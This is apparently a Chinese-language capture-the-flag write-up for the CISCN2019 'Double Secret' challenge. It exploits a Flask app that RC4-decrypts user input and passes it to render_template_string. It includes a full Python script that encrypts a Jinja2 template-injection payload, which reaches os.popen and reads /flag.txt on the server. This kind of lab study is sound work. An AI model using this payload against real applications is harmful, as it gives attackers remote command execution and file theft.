[CISCN2019 华东南赛区]Double Secret
国赛国赛,考的一个没听说过的RC4加密算法,只要能把加密算法做出来就是很简单的题目了
题解
打开题啥也没有抓包啥也没有就一句Welcome To Find Secret,直接猜get提交一个secret或者路由secret好吧(我是不是也开始成为赛棍了)
路由secret有效,给一句Tell me your secret.I will encrypt it so others can’t see,在get提交一个secret,给出了加密的奇奇怪怪的字符串
测试测试,乱输的时候出现了报错,用的flask,直接展示了部分源码
if(secret==None):
return 'Tell me your secret.I will encrypt it so others can\'t see'
rc=rc4_Modified.RC4("HereIsTreasure") #解密
deS=rc.do_crypt(secret)
a=render_template_string(safe(deS))
if 'ciscn' in a.lower():
return 'flag detected!'
return a
render_template_string,非常危险的函数好吧,safe应该是自己写的过滤,然后顺便检查了一下有没有带出flag,rc4百度了半天也没看见python的实现库,估计是出题人自己写的,HereIsTreasure应该是密钥,然后对输入的secret进行解密,然后用解密出来的结果进行ssti,顺便考虑一下绕过safe函数
算法研究实在太难,抄了大佬的脚本,事实上也可以去找在线加密网站,最后再自己base64解码再url编码也行
import base64
from urllib import parse
def rc4_main(key="init_key", message="init_message"): # 返回加密后得内容
s_box = rc4_init_sbox(key)
crypt = str(rc4_excrypt(message, s_box))
return crypt
def rc4_init_sbox(key):
s_box = list(range(256))
j = 0
for i in range(256):
j = (j + s_box[i] + ord(key[i % len(key)])) % 256
s_box[i], s_box[j] = s_box[j], s_box[i]
return s_box
def rc4_excrypt(plain, box):
res = []
i = j = 0
for s in plain:
i = (i + 1) % 256
j = (j + box[i]) % 256
box[i], box[j] = box[j], box[i]
t = (box[i] + box[j]) % 256
k = box[t]
res.append(chr(ord(s) ^ k))
cipher = "".join(res)
return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8'))
key = "HereIsTreasure" # 密钥
message = "{{{}.__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.__import__('os').popen('cat /flag.txt').read()[::-1]}}" # 明文
enc_base64 = rc4_main(key, message)
enc_init = str(base64.b64decode(enc_base64), 'utf-8')
enc_url = parse.quote(enc_init)
print("rc4加密后的url编码:" + enc_url)
那个safe函数好像什么用也没有,只会输出xxx is not allowed,但是事实上该执行的命令还是会执行,buu上的环境问题flag的格式是flag{xxx},所以最后那层的过滤就没有用了,不过想绕过也不难,分段读取或者翻转字符串什么的都可行
小坑
真的算坑吗,学艺不精导致的智障操作,payload没有用双大括号括起来,渲染出来就是自己的payload,想了半天怎么回事。。。渲染起码先来一个双大括号吧